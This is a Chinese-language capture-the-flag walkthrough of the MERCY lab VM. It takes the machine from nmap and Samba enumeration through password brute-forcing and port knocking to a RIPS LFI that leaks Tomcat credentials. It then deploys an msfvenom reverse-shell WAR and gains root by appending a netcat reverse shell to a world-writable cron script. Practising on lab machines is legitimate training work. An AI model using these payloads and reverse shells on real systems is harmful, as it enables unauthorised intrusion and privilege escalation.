digitalworld.local: MERCY靶機入侵

0x01 前言

MERCY是一個致力於PWK課程安全的靶機系統。MERCY是一款遊戲名稱，與易受攻擊的靶機名稱無關。本次實驗是攻擊目標靶機獲取root權限並讀系統目錄中的proof.txt信息

靶機的下載地址：

https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download（注意確認下載鏡像中MERCY.mf的sha256值是否正確）

 

0x02 信息收集

1.存活主機掃描

root@kali2018:~#arp-scan  -l

發現192.168.1.12就是目標靶機系統

2.端口掃描

經過NAMP對目標靶機進行端口掃描

root@kali2018:~# nmap  -A192.168.1.12 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 09:55 EST
 Nmap scan report for 192.168.1.12 Host is up (0.00091s latency). Not shown: 990 closed ports PORT STATESERVICE VERSION 22/tcp filtered ssh 53/tcp   opendomain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux) | dns-nsid: |_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu 80/tcp filtered http 110/tcp  openpop3?

139/tcp opennetbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp openimap Dovecot imapd |_ssl-date: TLS randomness does not represent time 445/tcp opennetbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 993/tcp  openssl/imap Dovecot imapd |_imap-capabilities: CAPABILITY | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2018-08-24T13:22:55

|_Not valid after:  2028-08-23T13:22:55

|_ssl-date: TLS randomness does not represent time 995/tcp  openssl/pop3s?

| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2018-08-24T13:22:55

|_Not valid after:  2028-08-23T13:22:55

|_ssl-date: TLS randomness does not represent time 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1

| http-methods: |_ Potentially risky methods: PUT DELETE |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache-Coyote/1.1

|_http-title: Apache Tomcat MAC Address: 00:0C:29:91:A0:C6 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s |_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: mercy | NetBIOS computer name: MERCY\x00 | Domain name: \x00 | FQDN: mercy |_  System time: 2019-02-12T22:57:54+08:00

| smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_  message_signing: disabled (dangerous, but default) | smb2-security-mode: |   2.02: |_ Message signing enabled but not required | smb2-time: |   date: 2019-02-12 09:57:54

|_  start_date: N/A TRACEROUTE HOP RTT ADDRESS 1   0.91 ms 192.168.1.12 OS and Service detection performed. Please report any incorrec

發現目標端口445,8080等端口開放.其餘如22,80被防火牆阻斷.其中samba服務已開啓(這是本文重點滲透目標)

0x03漏洞利用

不管在任何狀況下，咱們首先攻擊的應用目標是Apache

Tomcat(http://192.168.1.12:8080/)

嘗試訪問tomcat後臺管理頁面，但須要輸入正確的用戶名和密碼方可登錄。嘗試輸入各類已知的信息但仍是沒法進入。注意到其用戶的配置信息在/etc/tomcat7/tomcat-users.xml中。

1.Samba漏洞攻擊

 

經過smbclient命令列出目標靶機中可用的Samba服務共享名.

root@kali2018:~# smbclient -NL  192.168.1.12

可從上圖中看到共享的幾個名稱,下面將掛載其共享目錄到本地,但仍是不容許訪問目標共享,這裏需身份認證。

root@kali2018:~# mkdir  /mnt/file root@kali2018:~# mount  -tcifs  192.168.1.12:/qiu  /mnt/file

2.enum4linux枚舉Samba帳號

root@kali2018:~#  enum4linux -U -o 192.168.1.12

讓咱們將枚舉出來的帳號(qiu和pleadformercy)添加到mercy.txt中，並對其帳號進行爆破。

3.samba帳號爆破

root@kali2018:~#hydra -L mercy.txt -P/usr/share/wordlists/fasttrack.txt smb://192.168.1.12:139

可發現成功爆破出qiu的帳號，密碼爲空

4.mount命令掛載目錄

root@kali2018:~#mount -t cifs//192.168.1.12:/qiu/mnt/file -o username=qiu

列出掛載目錄下的文件信息

5.private目錄信息收集

發現.private目錄提供了一些重要系統信息

root@kali2018:~# cd  /mnt/file/ root@kali2018:/mnt/file# cd  .private root@kali2018:/mnt/file/.private# ls opensesame readme.txtsecrets root@kali2018:/mnt/file/.private# cd opensesame/ root@kali2018:/mnt/file/.private/opensesame# ls config configprint root@kali2018:/mnt/file/.private/opensesame# head -30 config Here are settings for your perusal. Port Knocking Daemon Configuration [options] UseSyslog [openHTTP] sequence = 159,27391,4 seq_timeout = 100 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT tcpflags = syn [closeHTTP] sequence = 4,27391,159 seq_timeout = 100 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPT tcpflags = syn [openSSH] sequence = 17301,28504,9999 seq_timeout = 100 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9999,28504,17301 seq_timeout = 100 command = /sbin/iptables -D iNPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn

上面顯示了端口啓動守護進程的防火牆端口開放的命令配置.

6.打開目標靶機防火牆端口

看到兩組sequence，一組用於HTTP，另外一組用於SSH。

（1）http的sequence腳本：

kncok.sh

#!/bin/bash for PORT in 159 27391 4;do nmap -Pn 192.168.1.12  -p $PORT; done

（2）SSH的sequence腳本：

kncok1.sh

#!/bin/bash for PORT in 17301 28504  9999;do nmap -Pn 192.168.1.12  -p $PORT; done

（3）經過sequence腳原本打開HTTP的端口

root@kali2018:~# ./knoch.sh Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
 Nmap scan report for 192.168.1.12 Host is up (0.00044s latency). PORT STATESERVICE 159/tcp closed nss-routing MAC Address: 00:0C:29:91:A0:C6 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
 Nmap scan report for 192.168.1.12 Host is up (0.00053s latency). PORT STATE SERVICE 27391/tcp closed unknown MAC Address: 00:0C:29:91:A0:C6 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:50 EST
 Nmap scan report for 192.168.1.12 Host is up (0.00042s latency). PORT STATESERVICE 4/tcp closed unknown MAC Address: 00:0C:29:91:A0:C6 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

（4）經過sequence腳原本打開SSH的端口

root@kali2018:~# ./knoch1.sh Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
 Nmap scan report for 192.168.1.12 Host is up (0.00049s latency). PORT STATESERVICE 17301/tcp closed unknown MAC Address: 00:0C:29:91:A0:C6 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
 Nmap scan report for 192.168.1.12 Host is up (0.00042s latency). PORT STATESERVICE 28504/tcp closed unknown MAC Address: 00:0C:29:91:A0:C6 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 12:58 EST
 Nmap scan report for 192.168.1.12 Host is up (0.00031s latency). PORT STATESERVICE 9999/tcp closed abyss MAC Address: 00:0C:29:91:A0:C6 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

經過以上命令開放了80和22端口,如今在kali系統下打開80端口網站。

 

7.目錄掃描

經過目錄工具dirb對目標靶機系統80端口網站進行掃描，發現存在robots.txt文件

root@kali2018:~# dirb http://192.168.1.12

打開robots.txt的鏈接地址，發現一個有趣的目錄/omercy

 

打開該目錄網站，可發現RIPS 0.53版本存在

8.RIPS漏洞收集

根據EDB-ID 18660，RIPS 0.53易受本地文件包含（LFI）漏洞影響。（RIPS 0.53 LFI)

在  exploit-db 中搜索RIPS 0.53 漏洞。

https://www.exploit-db.com/exploits/18660

其PoC爲:

http://localhost/rips/windows/code.php?file=../../../../../../etc/passwd

能夠本地文件包含讀出目標靶機的/etc/passwd的信息。

 

9.tomcat再次入侵

經過rips的lfi漏洞來本地包含tomcat-users.xml讀取其配置信息。

http://192.168.1.12/nomercy/windows/code.php?file=./../../../../..//etc/tomcat7/tomcat-users.xml

此文件泄露了8080端口上運行的tomcat管理後臺的用戶名和密碼信息

<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>

<? <user username="qiu" password="mercyplz" roles="manager-gui"/>

有了登陸憑證，如今能夠登陸管理器的webapp來部署惡意webapp，這是一個容許反彈shell的WAR文件。

登錄到管理後臺：

http://192.168.1.12:8080/manager/html

目標靶機系統爲32位的ubuntu系統

咱們能夠經過msfvenom命令來生成這樣的war包

root@kali2018:/opt#  msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.21  LPORT=3333  -f war -o shell.war

部署webapp後門文件shell.war

經過7z命令查看war包的內容，能夠看到包含了yillzdtgvccxzwp.jsp文件

root@kali2018:/opt# 7z l shell.war

訪問惡意Web應用程序，請在瀏覽器的地址欄中輸入如下內容：

http://192.168.1.12:8080/shell/yillzdtgvccxzwp.jsp

在攻擊機上執行nc監聽反彈命令並使用python生成交互式的shell：python -c ‘import pty; pty.spawn(「/bin/sh」)’

root@kali2018:/opt# nc -lvvp 3333

以普通用戶權限下查看其falg信息:

tomcat7@MERCY:/$ cat local.txt cat local.txt Plz have mercy on me! :-( :-( tomcat7@MERCY:/$

0x04  權限提高

能夠經過從tomcat-users.xml中搜索到登陸賬戶qiu。在信息收集的同時還發現了將權限提高爲root的方法。有一個腳本/home/qiu/.private/secrets/timeclock將每隔三分鐘，以root權限運行並寫入到目錄/var/www/html/time中。

tomcat7@MERCY:/$su qiu qiu@MERCY:~/.private/secrets$ ls -al/home/qiu/.private/secrets/timeclock ls -al  /home/qiu/.private/secrets/timeclock -rwxrwxrwx 1 root root 222 Aug 31 00:47 /home/qiu/.private/secrets/timeclock qiu@MERCY:~/.private/secrets$ cat timeclock #!/bin/bash now=$(date) echo "The system time is: $now." > ../../../../../var/www/html/time echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time chown www-data:www-data ../../../../../var/www/html/time

將如下命令添加到腳本timclock中，其中NC監聽的IP地址爲攻擊機（kali）的IP地址。

qiu@MERCY:~/.private/secrets$ echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21 5555 1>/tmp/p" >> timeclock <mp/p | nc 192.168.1.21  5555 1>/tmp/p" >> timeclock
 qiu@MERCY:~/.private/secrets$ cat timeclock cat timeclock #!/bin/bash now=$(date) echo "The system time is: $now." > ../../../../../var/www/html/time echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time chown www-data:www-data ../../../../../var/www/html/time rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.1.21  5555 1>/tmp/p

設置另外一個nc監聽,監聽端口爲5555,3分鐘後將反彈到目標root  shell.並在攻擊機上執行nc監聽反彈命令並使用python生成交互式的shell：python -c ‘import pty; pty.spawn(「/bin/sh」)’

root@kali2018:/mnt/file/.private/opensesame# nc -lvvp  5555 listening on [any] 5555 ... 192.168.1.12: inverse host lookup failed: Unknown host connect to [192.168.1.21] from (UNKNOWN) [192.168.1.12] 39346 python -c "import pty;pty.spawn('/bin/bash')"

0x05 flag信息查看

進入到root目錄而後查看proof.txt獲得flag信息

r

oot@MERCY:~# cd /root cd /root root@MERCY:~# ls ls author-secret.txt configproof.txt root@MERCY:~# cat proof.txt cat proof.txt Congratulations on rooting MERCY. :-) root@MERCY:~#